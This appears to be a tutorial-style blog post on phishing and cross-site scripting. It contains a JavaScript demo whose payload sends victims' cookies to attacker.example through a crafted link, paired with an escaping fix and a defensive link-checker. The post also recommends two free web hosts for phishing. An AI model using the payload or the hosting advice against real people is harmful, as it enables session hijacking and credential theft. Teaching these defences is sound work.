
How to do a phishing attack (Advanced Social Engineering)

What is a Phishing Scam?

Phishing attacks combine social engineering with technical deception to steal consumers' personal identity data and financial account credentials. The social-engineering side uses 'spoofed' emails to lead the user to a counterfeit website designed to trick the recipient into divulging data such as credit card numbers, account usernames, passwords and social security numbers. By hijacking the brand names of banks, e-commerce sites and credit card companies, phishers often convince recipients to respond.

The Common Method of Phishing

A spoofed email that appears to come from a trusted brand carries a link to a counterfeit login page. Whatever the victim types into that page goes to the attacker, not to the real site.

Other Methods of Communication

  • Email
  • Instant messages
  • Message boards
  • Guestbooks
  • Blog comments
  • Viruses, Trojan horses, spyware
  • etc.

Cross-Site Scripting (XSS)

  • Targets the user, not the website
  • JavaScript is what makes XSS dangerous: every browser runs it, and it can read and act on the page
  • One of the most commonly found web vulnerabilities
  • Its impact is underestimated or misunderstood

Type 1 (click the link): reflected XSS

The most common variety of XSS. It requires the victim to click a link. When the victim clicks, the JavaScript carried in the link executes in the context of the victim site's domain, so the cookies the browser holds for that site can end up in the attacker's hands.

The attacker sends the user an email containing a specially crafted link. The spoofed email looks legitimate, but the link is laced with embedded JavaScript code. When the user clicks the link, the script sends the user's cookies to the attacker, where they can be used to hijack the user's session.


Type 2 (HTML Injection): stored XSS

The most dangerous variety of XSS. It does not require the user to click anything; visiting a web page is enough. Commonly found in HTML email, message boards and blog posts.

The user opens an email message (or a message-board post) written by the attacker. The message contains JavaScript exploit code which executes automatically when the page loads. The script sends the user's cookies to a web server the attacker controls, and the attacker retrieves them from that server's logs.
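Both variants above, modelled as an added example (this is my own illustration, not code from the original post or from the PDF it was taken from). The site name bank.example, the collector host attacker.example, the in-memory message board and the escapeHtml helper are all constructed for the demonstration; the payload is the same cookie-stealing script the slides describe, and the fix in both cases is to escape untrusted text before it is placed into HTML.

```javascript
// Added example (not from the original post): a tiny model of reflected
// (Type 1) and stored (Type 2) XSS and of the output escaping that prevents
// both. All names, URLs and posts below are constructed for illustration.

// Minimal HTML escaping for text placed inside an element body or a
// double-quoted attribute. Covers the five characters that matter.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The payload from the slides: read document.cookie and ship it to a host
// the attacker controls, where it shows up in that server's access log.
const COOKIE_THIEF =
  '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>';

// ---- Type 1: reflected XSS ("click the link") ----
// Vulnerable: the q parameter is echoed straight into the page.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<h1>Results for: ${q}</h1>`;
}
// Fixed: the same page with the untrusted value escaped.
function renderSearchFixed(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}
// The link a phishing mail would carry (constructed; bank.example is hypothetical).
const craftedLink =
  'https://bank.example/search?q=' + encodeURIComponent(COOKIE_THIEF);

// ---- Type 2: stored XSS ("HTML injection") ----
// A message board that keeps posts in memory. No click is needed: every
// visitor who loads the board runs whatever was stored.
const posts = [];
function submitPost(author, body) {
  posts.push({ author, body });
}
function renderBoardVulnerable() {
  return posts.map(p => `<p><b>${p.author}</b>: ${p.body}</p>`).join('\n');
}
function renderBoardFixed() {
  return posts
    .map(p => `<p><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</p>`)
    .join('\n');
}

// Crude check used below: does the rendered HTML still contain a live
// <script> tag? (An escaped one reads "&lt;script&gt;" and is inert.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demonstration: one honest post and one carrying the payload.
submitPost('alice', 'Hello everyone');
submitPost('mallory', COOKIE_THIEF);
console.log('reflected, vulnerable:', containsScriptTag(renderSearchVulnerable(craftedLink)));
console.log('reflected, fixed:     ', containsScriptTag(renderSearchFixed(craftedLink)));
console.log('stored, vulnerable:   ', containsScriptTag(renderBoardVulnerable()));
console.log('stored, fixed:        ', containsScriptTag(renderBoardFixed()));
```

Two points the model makes visible: the reflected case needs the victim to follow craftedLink, while the stored case fires for every visitor once mallory's post is saved; and the defence is the same in both, escaping at the point where untrusted text is written into HTML. Setting the session cookie with the HttpOnly attribute additionally keeps document.cookie from returning it, which blunts this particular payload, though script running in the page can still act as the user.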


XSS Can Be Used To…

  • Steal cookies and hijack sessions
  • Execute unintended website functionality
  • Harass users with malicious code
  • Alter any portion of the web page

Free Web Hosting Sites  for Phishing 

  • www.my3gb.com/

  • https://www.000webhost.com

How to Prevent Phishing Attacks

  • Never click links in email you were not expecting; open the site by typing its address yourself
  • Clear your cookies daily and log out of sites when you are finished, so a stolen session cookie stops working sooner
  • Never visit a website you cannot verify is genuine; check the address in the browser bar, not the text of the link
  • Never enter account details into a survey or form that arrives by email
  • Install internet security software and keep it up to date
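The first and third points above can be checked mechanically on the links an email actually carries. The following is an added example of my own (not from the original post): it pulls the anchors out of a constructed HTML mail and scores each one with the tell-tales of a spoofed link. The allow-list, the bank name acmebank.example, the sample mail and the simplification that the registered domain is the last two labels (a real implementation would use the public suffix list) are all assumptions made for the demonstration.

```javascript
// Added example (not from the original post): phishing-link heuristics.
// The allow-list, domain names and the sample mail are constructed.

// Domains the user legitimately does business with (hypothetical).
const KNOWN_GOOD = ['acmebank.example', 'www.acmebank.example'];

// Pull a hostname out of anchor text such as "https://www.acmebank.example/login".
function extractHost(text) {
  const m = /^(?:https?:\/\/)?([a-z0-9.-]+\.[a-z]{2,})/i.exec(text.trim());
  return m ? m[1].toLowerCase() : null;
}

// Return the reasons a link looks like phishing; an empty list means none found.
function inspectLink(href, anchorText) {
  const reasons = [];
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return ['unparseable href'];
  }
  const host = url.hostname; // WHATWG URL serialises Unicode hosts as punycode

  // 1. The visible text names one site, the href goes somewhere else.
  const shownHost = extractHost(anchorText);
  if (shownHost && shownHost !== host) {
    reasons.push(`text says ${shownHost} but link goes to ${host}`);
  }
  // 2. A raw IP address instead of a name.
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.startsWith('[')) {
    reasons.push('host is an IP address');
  }
  // 3. An internationalised (xn--) label, which can be a homoglyph of a brand.
  if (host.split('.').some(l => l.startsWith('xn--'))) {
    reasons.push('host uses punycode');
  }
  // 4. The brand name appears in a host or path that is not the brand's domain.
  //    Simplification: registered domain = last two labels (assumption).
  for (const good of KNOWN_GOOD) {
    const brand = good.split('.').slice(-2).join('.');
    const label = brand.split('.')[0];
    const isBrandDomain = host === brand || host.endsWith('.' + brand);
    if (!isBrandDomain &&
        (host.includes(label) || url.pathname.toLowerCase().includes(label))) {
      reasons.push(`brand "${brand}" used on unrelated host ${host}`);
      break;
    }
  }
  // 5. Plain HTTP on a link that wants credentials.
  if (url.protocol !== 'https:') reasons.push('not HTTPS');
  return reasons;
}

// Walk every <a href="...">text</a> in an HTML mail and score it.
function scanEmail(html) {
  const out = [];
  for (const m of html.matchAll(/<a\s+[^>]*href="([^"]*)"[^>]*>(.*?)<\/a>/gis)) {
    out.push({ href: m[1], text: m[2], reasons: inspectLink(m[1], m[2]) });
  }
  return out;
}

// Constructed sample: three spoofed links and one genuine one.
// The xn-- label is a Cyrillic homoglyph hostname written in its punycode form.
const SAMPLE_MAIL = `
<p>Dear customer, your account has been locked.</p>
<a href="http://acmebank.example.verify-login.example/secure">https://www.acmebank.example/login</a>
<a href="https://203.0.113.7/acmebank/login">Confirm your identity</a>
<a href="https://www.xn--80ak6aa92e.example/">Update password</a>
<a href="https://www.acmebank.example/help">Contact us</a>
`;

for (const r of scanEmail(SAMPLE_MAIL)) {
  console.log(r.href, '=>', r.reasons.length ? r.reasons.join('; ') : 'looks fine');
}
```

The check is deliberately against the href, never the displayed text, because the displayed text is exactly what the attacker controls. Run it, and the first link collects three reasons (text/href mismatch, brand on an unrelated host, plain HTTP), the second two (IP host, brand in the path), the third one (punycode), and the genuine help link none.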

The source of this article is a PDF by an anonymous author which I found on the internet.
